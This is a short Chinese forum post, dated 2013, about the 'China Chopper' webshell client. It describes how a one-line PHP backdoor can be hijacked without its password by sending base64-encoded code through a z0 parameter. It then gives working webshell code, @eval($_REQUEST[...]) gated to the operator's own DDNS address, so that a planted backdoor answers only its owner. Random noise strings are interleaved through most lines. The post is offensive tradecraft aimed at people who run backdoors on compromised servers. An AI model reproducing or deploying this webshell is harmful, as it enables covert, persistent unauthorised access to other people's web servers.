今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
/ a1 v: Q0 r# S7 K: S' r5 w0 \' ~; A
就算你设置了密码,使用了eval($_REQUEST['moyo']);
! ^3 X8 ^$ x ?+ @1 Y% I
0 q7 j. t% s+ S) N' |9 Z" H但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门/ a6 M: _; e" v# t, v; J
W+ X$ B6 C9 }! J% }) |2 I# V1 p因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));; N4 N: t0 E3 ^ x3 R/ X) _
- h3 }( L! g: S/ x直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了9 b# m3 d* l) Q* V- ~( l9 ]2 Y3 N
) N" P& S6 b, `0 A不知道是设计缺陷还是故意留的后门
0 c* a0 H/ S) P" e$ G! ~5 O0 K- V) v3 I9 c* F9 B. t
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用" w* a# b, I6 ~
, ^5 D8 [5 i: j: ?; m本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org: {. M) B% T9 |9 z/ m: U! A
/ D# ~( d# E6 b" [& `6 ?" `
然后一句话后门这样写
% x1 c& t! e; _6 l4 l
6 E0 v. s& t+ `% S& v<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
9 z/ v% ?- K/ \( K$ i2 ~+ w8 ~这样就可以让一句话后门只允许自己的电脑连接了
: E# O2 N6 @3 D* D* G4 ?, z! V
* g! M3 N6 Y6 l# m- I# ]- f |
发表于 2013-7-26 12:45:48
收藏
支持
反对